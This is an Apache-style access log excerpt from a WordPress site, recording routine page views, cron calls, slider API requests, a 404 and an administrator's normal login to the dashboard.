14.108.234.62 - - [28/Aug/2025:14:02:09 +0800] "GET /material.html HTTP/1.1" 200 6459 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [28/Aug/2025:14:03:04 +0800] "POST /wp-cron.php?doing_wp_cron=1756360984.9515900611877441406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.234.62 - - [28/Aug/2025:14:03:05 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2058 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:14:03:05 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=3 HTTP/1.1" 200 2292 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [28/Aug/2025:14:07:48 +0800] "POST /wp-cron.php?doing_wp_cron=1756361267.9799270629882812500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.234.62 - - [28/Aug/2025:14:07:48 +0800] "GET //Material.html HTTP/1.1" 301 5 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:14:07:48 +0800] "GET /Material.html HTTP/1.1" 404 8989 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:14:07:58 +0800] "GET /wp-admin/ HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:14:07:58 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 2781 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:14:08:03 +0800] "POST /wp-login.php HTTP/1.1" 302 5 "http://cqqizhou.com/wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2F&reauth=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
20.99.210.75 - - [28/Aug/2025:14:08:05 +0800] "GET /Material.html HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0"
14.108.234.62 - - [28/Aug/2025:14:08:08 +0800] "GET /wp-admin/ HTTP/1.1" 200 60399 "http://cqqizhou.com/wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2F&reauth=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
